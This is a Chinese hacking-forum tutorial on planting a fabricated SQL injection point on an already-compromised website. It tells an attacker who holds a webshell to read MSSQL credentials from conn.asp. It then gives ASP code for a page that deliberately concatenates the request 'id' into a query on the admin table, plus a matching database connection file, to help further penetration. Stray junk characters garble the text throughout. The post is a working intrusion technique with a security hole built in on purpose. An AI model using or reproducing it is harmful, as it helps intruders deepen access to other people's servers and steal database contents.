自己构造注入点方便入侵
+ v% `' n3 r2 H: u2 Q" b% V$ O; w+ W5 F- W( z; L
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
3 [7 Y: Q0 O. b! S J, x+ s" V: i4 q6 z, s7 y+ `
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!5 e$ Y# Q8 S) o. r4 c0 c
6 O% K3 ^* A. v' o! C
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和 F) e1 J; V3 x5 Y
, K0 T) r" u2 \. U7 V8 i. ^密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
& r# q0 H: P# l2 q& {* d0 F4 m7 c" c# A
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下: [4 g2 q6 F( w' P& v
' F, A R! g7 T; U+ G, H1 V
程序代码( Y$ E0 O! q8 T- j( O; W9 @
<!--#include file="xx.asp"-->. {4 J: d- n9 c- }4 `) N: F) @& K
<%2 g0 i% F6 ]3 ?8 A9 R, D9 v
set rs=server.createobject("ADODB.recordset")( m0 D! }' P4 z
id = request("id")
5 t% w1 c" S9 R, j$ S4 rstrSQL = "select * from admin where id=" & id" N; N( l9 P7 w0 X
rs.open strSQL,conn,1,3
1 Y: C7 ^: H2 xrs.close. l0 Q- b% ^7 m+ ]
%>8 ` P7 l0 ?! P% d9 ]
3 B0 s i" c) c& p3 i7 }把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在9 V5 b( _ }3 h
& o3 |, B* k0 _! s1 o2 u你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
! m6 |' |& p } G* P+ S3 W/ }6 \; x+ K8 |8 q0 S# J q# O
然后就要构造一个连接数据库的文件了,代码如下:
1 S8 i; t$ B$ C7 |0 o; P+ g程序代码0 t1 X, B. c) h
<%
6 K2 ]: {; v/ C6 _strSQLServerName = "000.000.000.000" '服务器名称或地址
! t7 b/ f: l U& [7 Z0 D, cstrSQLDBUserName = "sqlname" '数据库帐号
/ M/ v9 F) L: x8 i; @ `" E( g3 NstrSQLDBPassword = "sqlpass" '数据库密码
3 t* r- i% ]% r# M7 \2 R- P- \: gstrSQLDBName = "sqldataname" '数据库名称
& Z* u5 {( E/ |1 z1 `3 z7 B+ pSet conn = Server.CreateObject("ADODB.Connection")
8 A. _; F% E; n$ b, b- {: AstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"3 a8 Y) g q9 ^/ p
conn.open strCon
7 @/ f' z4 E0 E: p%>/ i1 I" r' w: q' ?% U U
/ Y0 M/ I& s; ~8 w这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
, l( {& W& y: u$ V7 O/ ^6 B/ c' z
* N! a3 |" S% k) b, k# R就这样,正常情况下,就OK了,伪造成功……
0 B' r, g9 S0 e0 X
- f" S, I3 m4 E/ Y* P 如果有什么问题可以提出来大家一起探讨解决。 |